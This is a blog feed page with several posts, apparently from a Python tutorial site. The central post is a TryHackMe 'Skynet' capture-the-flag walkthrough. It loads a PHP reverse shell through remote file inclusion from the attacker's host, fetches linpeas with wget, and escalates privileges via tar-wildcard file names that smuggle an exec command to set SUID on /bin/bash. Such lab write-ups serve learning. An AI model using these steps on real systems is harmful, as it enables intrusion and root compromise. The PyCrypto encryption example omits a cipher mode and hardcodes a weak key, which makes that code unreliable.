Posted on Leave a comment

Two Easy Ways to Encrypt and Decrypt Python Strings

5/5 – (1 vote)

Today I gave a service consultant access to one of my AWS servers. I have a few files on the server that I was reluctant to share with the service consultant because these files contain sensitive personal data. Python is my default way to solve these types of problems. Naturally, I wondered how to encrypt this data using Python — and decrypt it again after the consultant is done? In this article, I’ll share my learnings! 👇

🔐 Question: Given a Python string. How to encrypt the Python string using a password or otherwise and decrypt the encrypted phrase to obtain the initial cleartext again?

There are several ways to encrypt and decrypt Python strings. I decided to share only the top two ways (my personal preference is Method 1):

Method 1: Cryptography Library Fernet

To encrypt and decrypt a Python string, install and import the cryptography library, generate a Fernet key, and create a Fernet object with it. You can then encrypt the string using the Fernet.encrypt() method and decrypt the encrypted string using the Fernet.decrypt() method.

If you haven’t already, you must first install the cryptography library using the pip install cryptography shell command or variants thereof. 👉 See more here.

Here’s a minimal example where I’ve highlighted the encryption and decryption calls:

# Import the cryptography library
from cryptography.fernet import Fernet # Generate a Fernet key
key = Fernet.generate_key() # Create a Fernet object with that key
f = Fernet(key) # Input string to be encrypted
input_string = "Hello World!" # Encrypt the string
encrypted_string = f.encrypt(input_string.encode()) # Decrypt the encrypted string
decrypted_string = f.decrypt(encrypted_string) # Print the original and decrypted strings
print("Original String:", input_string)
print("Decrypted String:", decrypted_string.decode())

This small script first imports the Fernet class from the cryptography library that provides high-level cryptographic primitives and algorithms such as

  • symmetric encryption,
  • public-key encryption,
  • hashing, and
  • digital signatures.

A Fernet key is then generated and used to create a Fernet object. The input string to be encrypted is then provided as an argument to the encrypt() method of the Fernet object. This method encrypts the string using the Fernet key and returns an encrypted string.

The encrypted string is then provided as an argument to the decrypt() method of the Fernet object. This method decrypts the encrypted string using the Fernet key and returns a decrypted string.

Finally, the original string and the decrypted string are printed to the console.

The output is as follows:

Original String: Hello World!
Decrypted String: Hello World!

Try it yourself in our Jupyter Notebook:

Method 2: PyCrypto Cipher

Install and import the PyCrypto library to encrypt and decrypt a string. As preparation, you need to make sure to pad the input string to 32 characters using string.rjust(32) to make sure it is the correct length. Then, define a secret key, i.e., a “password”. Finally, encrypt the string using the AES algorithm, which is a type of symmetric-key encryption.

You can then decrypt the encrypted string again by using the same key.

Here’s a small example:

# Import the PyCrypto library
import Crypto # Input string to be encrypted (padding to adjust length)
input_string = "Hello World!".rjust(32) # Secret key (pw)
key = b'1234567890123456' # Encrypt the string
cipher = Crypto.Cipher.AES.new(key)
encrypted_string = cipher.encrypt(input_string.encode()) # Decrypt the encrypted string
decrypted_string = cipher.decrypt(encrypted_string) # Print the original and decrypted strings
print("Original String:", input_string)
print("Decrypted String:", decrypted_string.decode())

This code imports the PyCrypto library and uses it to encrypt and decrypt a string.

The input string is "Hello World!", which is padded to 32 characters to make sure it is the correct length.

Then, a secret key (password) is defined.

The string is encrypted using the AES algorithm, which is a type of symmetric-key encryption.

The encrypted string is then decrypted using the same key and the original and decrypted strings are printed. Here’s the output:

Original String: Hello World!
Decrypted String: Hello World!

Try it yourself in our Jupyter Notebook:

Thanks for Visiting! ♥

To keep learning Python in practical coding projects, check out our free email academy — we have cheat sheets too! 🔥

Posted on Leave a comment

$821,000 Ethereum Value per Solidity Developer

5/5 – (1 vote)

Ethereum’s Total Value Locked (TVL) is $28,000,000,000 USD and Ethereum’s market cap is $193,000,000,000 USD. Based on my estimations below, there are at most 269,000 monthly active Solidity developers.

Therefore, the Ethereum TVL per Solidity developer is more than $104,000, and the Ethereum market cap per Solidity developer is more than $717,000. So for all practical purposes, you can assume that the total value locked per Solidity developer is at least $821,000.*

*I used very conservative assumptions; the real numbers will be much higher (see below). Also, I’m aware that not all Ethereum developers use Solidity, but most (see below). At the time of writing, we’re amid a bear market in 2023, with the TVL of both Ethereum and its Solidity smart contracts down roughly 70%. As the number of developers doesn’t grow proportionally to the price in a bull market, this number can be seen as a historic “worst-case” estimation.

How Many Monthly Active Solidity Developers Are There?

My basic assumption is that a monthly active Solidity developer checks the Solidity docs at least once per month. Currently, the Solidity docs have 580,000 visits per month and 2.15 pages per visit, so our estimate is 269,000 active Solidity developers per month.

Reasons there are more Solidity developers: Some active Solidity developers may not check out the docs during development. However, I think this won’t change the number by more than a factor of 2-3x.

Reasons there are fewer Solidity developers: On the other hand, this may be a significant overestimation of the number of Solidity devs because the number of sessions may be much larger than the number of active users. Many Solidity developers will check out the docs multiple times per month!

So, the 269,000 Solidity developers per month number is likely to be a significant overestimation and can be seen as an upper bound. Consequently, the TVL per Solidity developer will be much larger than our $821,000 number, even considering that not all ETH dApp developers use Solidity (only most).

If you’re interested in learning to create your own dApps and participate in this highly profitable growth market, check out our new Finxter Academy course:

Posted on Leave a comment

[TryHackMe] Skynet Walkthrough Using Remote File Inclusion

5/5 – (1 vote)

🔐 How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer

YouTube Video

CHALLENGE OVERVIEW

  • Link: https://tryhackme.com/room/skynet
  • Difficulty: Easy
  • Target: user/root flags
  • Highlight: exploiting a remote file inclusion vulnerability to spawn a reverse shell
  • Tools used: smbclient, smbmap, gobuster, metasploit
  • Tags: gobuster, smb, rfi, squirrelmail

BACKGROUND

In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.

IPs

export targetIP=10.10.144.117
export myIP=10.6.2.23

ENUMERATION

sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn

NMAP SCAN RESULTS

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.10% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.13% done; ETC: 18:35 (0:02:18 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.35% done; ETC: 18:36 (0:02:46 remaining)
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.56% done; ETC: 18:36 (0:03:10 remaining)
Nmap scan report for 10.10.144.117
Host is up (0.084s latency).
Not shown: 65529 closed tcp ports (reset)
PORT	STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
| smb2-security-mode:
| 3.1.1:
|_	Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-01-24T04:40:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-01-23T22:40:36-06:00 TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 13.67 ms 10.6.0.1
2 ... 3
4 81.31 ms 10.10.144.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds

DIRB SCAN RESULTS

The SquirrelMail directory looks interesting. We’ll check that out in a minute.

ENUMERATE THE SMB SHARE WITH NMAP SCAN

nmap --script smb-enum-shares -p 139 10.10.144.117

Output:

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
Nmap scan report for 10.10.144.117
Host is up (0.086s latency). PORT	STATE SERVICE
139/tcp open netbios-ssn Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.144.117\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.144.117\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_	Current user access: <none>
smbmap -H 10.10.144.117
[+] Guest session IP: 10.10.144.117:445 Name: 10.10.144.117 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))

LOGIN TO SAMBA SHARES AS ANONYMOUS

smbclient //10.10.144.117/anonymous
Password for [WORKGROUP\kalisurfer]:
Try "help" to get a list of possible commands.
smb: \> ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 grab the log1.txt (a password list)
milesdyson (username)

WALK THE WEBSITE

We discovered a login portal for squirrelmail from the dirb scan. Let’s check it out now in our browser.

http://10.10.144.117/squirrelmail

Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.

SquirrelMail version 1.4.23 [SVN]
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion

ENUMERATING THE SMB SHARE

The first password from the log1.txt file from the smb share on the list works! We are in milesdyson’s email account now and see two interesting emails.

serenakogan@skynet 01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 skynet@skynet
new smb password: )s{A&2Z=F^n_E.B`

LOGIN TO SMB SHARE AS milesdyson

smbclient //$targetIP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019 9204224 blocks of size 1024. 5831424 blocks available

Let’s grab the important.txt file:

get important.txt

Reading through the contents, we are pointed toward a hidden beta cms directory

/45kra24zxs28v3yd

GOBUSTER FOR DIRECTORY SNIFFING

We’ll further enumerate the hidden beta cms directory now with gobuster.

gobuster dir -uhttp://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.173/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
Progress: 337 / 4615 (7.30%) Progress: 397 / 4615 (8.60%) Progress: 456 / 4615 (9.88%) Progress: 507 / 4615 (10.99%) Progress: 558 / 4615 (12.09%) Progress: 618 / 4615 (13.39%) Progress: 674 / 4615 (14.60%) Progress: 728 / 4615 (15.77%) Progress: 788 / 4615 (17.07%) Progress: 845 / 4615 (18.31%) Progress: 898 / 4615 (19.46%) Progress: 956 / 4615 (20.72%) Progress: 1015 / 4615 (21.99%) Progress: 1072 / 4615 (23.23%) Progress: 1125 / 4615 (24.38%) Progress: 1185 / 4615 (25.68%) Progress: 1245 / 4615 (26.98%) Progress: 1299 / 4615 (28.15%) Progress: 1359 / 4615 (29.45%) Progress: 1419 / 4615 (30.75%) Progress: 1472 / 4615 (31.90%) Progress: 1532 / 4615 (33.20%) Progress: 1590 / 4615 (34.45%) Progress: 1640 / 4615 (35.54%) Progress: 1700 / 4615 (36.84%) Progress: 1750 / 4615 (37.92%) Progress: 1804 / 4615 (39.09%) Progress: 1864 / 4615 (40.39%) Progress: 1904 / 4615 (41.26%) Progress: 1964 / 4615 (42.56%) Progress: 2020 / 4615 (43.77%) /index.html (Status: 200) [Size: 418] Progress: 2063 / 4615 (44.70%) Progress: 2123 / 4615 (46.00%) Progress: 2173 / 4615 (47.09%) Progress: 2216 / 4615 (48.02%) Progress: 2273 / 4615 (49.25%) Progress: 2333 / 4615 (50.55%) Progress: 2383 / 4615 (51.64%) Progress: 2443 / 4615 (52.94%) Progress: 2503 / 4615 (54.24%) Progress: 2563 / 4615 (55.54%) Progress: 2618 / 4615 (56.73%) Progress: 2673 / 4615 (57.92%) Progress: 2733 / 4615 (59.22%) Progress: 2782 / 4615 (60.28%) Progress: 2842 / 4615 (61.58%) Progress: 2903 / 4615 (62.90%) Progress: 2962 / 4615 (64.18%) Progress: 3020 / 4615 (65.44%) Progress: 3075 / 4615 (66.63%) Progress: 3135 / 4615 (67.93%) Progress: 3194 / 4615 (69.21%) Progress: 3254 / 4615 (70.51%) Progress: 3305 / 4615 (71.61%) Progress: 3364 / 4615 (72.89%) Progress: 3424 / 4615 (74.19%) Progress: 3484 / 4615 (75.49%) Progress: 3544 / 4615 (76.79%) Progress: 3597 / 4615 (77.94%) Progress: 3655 / 4615 (79.20%) Progress: 3707 / 4615 (80.33%) Progress: 3767 / 4615 (81.63%) Progress: 3827 / 4615 (82.93%) Progress: 3887 / 4615 (84.23%) Progress: 3947 / 4615 (85.53%) Progress: 4001 / 4615 (86.70%) Progress: 4058 / 4615 (87.93%) Progress: 4115 / 4615 (89.17%) Progress: 4174 / 4615 (90.44%) Progress: 4234 / 4615 (91.74%) Progress: 4285 / 4615 (92.85%) Progress: 4338 / 4615 (94.00%) Progress: 4398 / 4615 (95.30%) Progress: 4458 / 4615 (96.60%) Progress: 4513 / 4615 (97.79%) Progress: 4570 / 4615 (99.02%) ===============================================================
2023/01/24 09:53:04 Finished
===============================================================

ADMINISTRATOR PORTAL DISCOVERED!

http://10.10.169.173/45kra24zxs28v3yd/administrator/

IDENTIFY A KNOWN VULNERABILITY

Looking up the service name shows us that there is a remote file inclusion vulnerability.

SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION

After preparing a basic php revshell, serving it with a simple HTTP server, we now go to our browser and load the address:

http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php

STABILIZE THE SHELL

python -c 'import pty;pty.spawn("/bin/bash")';

ENUMERATE WITH LINPEAS

After downloading linpeas.sh and serving it with the simple HTTP server, we can copy it over to our target machine’s /tmp folder with wget http://$myIP:port/linpeas.sh.

$ ./linpeas.sh
 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄	▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version	: https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop

🔐 ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝
OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: skynet
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial ╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16 ╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034 Potentially Vulnerable to CVE-2022-2588 ---abbreviated ---
THE MOST RELEVANT INFO FROM LINPEAS in bold:
VULNERABLE TO CVE-2021-4034
MAYBE CVE-2022-2588 https://github.com/carlospolop/PEASS-ng/releases/download/20230122/linpeas.sh
[+] [CVE-2017-16995] eBPF_verifier Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html Exposure: highly probable Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic} Download URL: https://www.exploit-db.com/download/45010 Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

FURTHER ENUMERATION

Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.

CHECK CRONJOBS

cat /etc/crontab

Output:

# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root	cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

The first job in the list is set to run every minute and it just executes backup.sh. Let’s find out what that file does.

We can see that backup.sh starts a new shell, changes directory to /var/www/html and then creates a tarball file of all the files from /var/www/html and stores it in home/milesdyson/backups/backup.tgz

The * is a wildcard symbol that means everything in the current directory. We can exploit this by adding our own files and using file names with unusual extensions to launch a malicious file, magic.sh as part of the automated cronjob that runs backup.sh and creates a tarball every minute of the contents of the directory.

PLAN AND CARRY OUT PRIVILEGE ESCALATION

First, we’ll create the magic.sh file that will add a SUID bit to /bin/bash. The next time we spawn a shell after setting up the hack and waiting at least 1 minute, we can use persistence mode (/bin/bash -p) to spawn a root shell.

printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh

Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our magic.sh program and add the SUID bit to /bin/bash.

echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
echo "/var/www/html" > --checkpoint=1

USER FLAG

Let’s grab the root flag from /home/milesdyson

$ cat user.txt
7c—-omitted—----07

ROOT FLAG

cat /root/root.txt
3f—-omitted—----49

TAKE-AWAYS

Takeaway #1 – The simpler solution is usually the better solution. - I wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session.

In the end, I learned I had overlooked setting the payload on msfconsole listener (exploit(multi/handler)) to match that of my reverse shell payload.

It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. I used a basic shell session to root the box, and all of that precious time spent on metasploit didn’t help us get root access.

Takeaway #2 – Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.

Posted on Leave a comment

I Used These 3 Easy Steps to Create a Bitcoin Wallet in Python (Public/Private)

5/5 – (1 vote)

As I write this, Bitcoin is in a deep bear market. That’s the perfect time to learn about the tech and start building!

After listening to a podcast from Lyn Alden today, I wondered if it is possible to programmatically create a Bitcoin wallet, i.e., a public/private key pair.

This can be extremely useful in practice, not only if you want to create an application that uses the “decentralized money layer” to transfer value between two parties in a fully automatic way, but also if you want to quickly create a public/private key pair to send and receive BTC without trusting a third party.

You may not trust that wallet provider after all. It is in the nature of the Bitcoin protocol that if you desperately need it, you’ll need it quickly and without lots of trust assumptions. So better be prepared!

In this project, we’ll answer the following interesting question.

🪙 Project: How to create a Bitcoin wallet in Python (public/private key pair)?

Step 1: Install Library

Use PIP to install the bitcoinaddress library in your actual or virtual environment.

🔐 Is It Safe? I investigated the library code from the GitHub repository associated with this library, and I couldn’t find any trust issues. Specifically, I searched for “hacks” in the code, such as sending the public/private key pair to a remote server, but the repository seems to be clean. It is also well-respected in the community, so unlikely to be tampered with. I didn’t check if the public/private key pairs have maximum entropy, i.e., are truly randomly created with all private keys having the same likelihood. I cannot guarantee that this is 100% safe because I don’t know the owner of the library — but it looks safe at first and second glance.

To install the library, here are three of the most common ways:

👉 Python 3
pip3 install bitcoinaddress 👉 Standard Python and Python 2 Installation
pip install bitcoinaddress 👉 Jupyter Notebook Cell
!pip install bitcoinaddress

Here’s what this looks like in my Jupyter Notebook:

🌍 Recommended: 5 Steps to Install a Python Library

Step 2: Import and Create Wallet

The Wallet class from the bitcoinaddress module allows you to easily create a new and random public/private keypair using the Wallet() constructor method, i.e., all you need to create a new random Bitcoin wallet.

from bitcoinaddress import Wallet
wallet = Wallet()

Stay with me. You’re almost done! 💪

Step 3: Print Wallet

Next, print the content of the newly created wallet. This contains all the information you need about the public and private keys and addresses.

print(wallet)

In the following output, I bolded the two relevant lines with the public address and the private key:

Private Key HEX: 6b789bec69f7f90c2ed73c8ee58f1f899b42fde5641359f6b76a27b4406399f7
Private Key WIF: 5JdcnccAMqs1t38VTPyeGHgBQ7KaYGueSqUAmLBTzVqFzh4ssUN
Private Key WIF compressed: KzpcxLACJzfktGQ4bWR1UUbvtzu133DNH2vv6ffC8nG1BFSUFBfr Public Key: 0415d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be997d31989f6dcca716db63898c739621a86aa4a7bbe74c8936a6f1bbc7937c5c0 Public Key compressed: 0215d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be9 Public Address 1: 14XyDoAgdGF7xiCrgux5Bd7P993PnXALuW 
Public Address 1 compressed: 1LW26DRtBraVQ5ec7J5D3uQsM3AD3oVHXx Public Address 3: 32iX1WnnMkLQLc6beTQ6no5H4J6arvUeBP Public Address bc1 P2WPKH: bc1q6hn4e55vfh6ka0z88tpr2jmqze8w4j84axsjh4 Public Address bc1 P2WSH: bc1qhff5zxmy7rs5mvx037ztg95nnnqe97fet66l65xgsafv89tmz8xssm8tph 

The output of the bitcoinaddress.Wallet() method provides the details of a new bitcoin wallet.

It includes the private key in both HEX and Wallet Import Format (WIF) formats, as well as the compressed version of the WIF.

It also provides the public key, both in uncompressed and compressed formats, as well as three different public addresses generated from the public key.

I actually checked the address on a Blockchain explorer, and it’s the correct one:

I also checked if the public and private addresses match and they seem to do:

Additionally, it provides 2 SegWit addresses generated from the public key; one in Pay-to-Witness-Public-Key-Hash (P2WPKH) format and one in Pay-to-Witness-Script-Hash (P2WSH) format.

Posted on Leave a comment

20 Real-Life Skills You Need as a UI Developer in 2023

5/5 – (2 votes)

I have created many apps throughout my career. Some apps, such as the Finxter Python learning app, have reached millions of users over the years.

While I’m not a professional web designer (by education), I was taught the hard way (by trial and error) that there are some crucial and timeless skills you need to master as a User Interface developer no matter what.

This list of 20 tips is my best-of compilation. So, without further ado, let’s dive right in! 👇

Skill 1: HTML/CSS

HTML and CSS are the building blocks of any website, and a must-have for any UI developer.

HTML is the structural markup language used to create webpages, while CSS is the styling language used to make them look attractive.

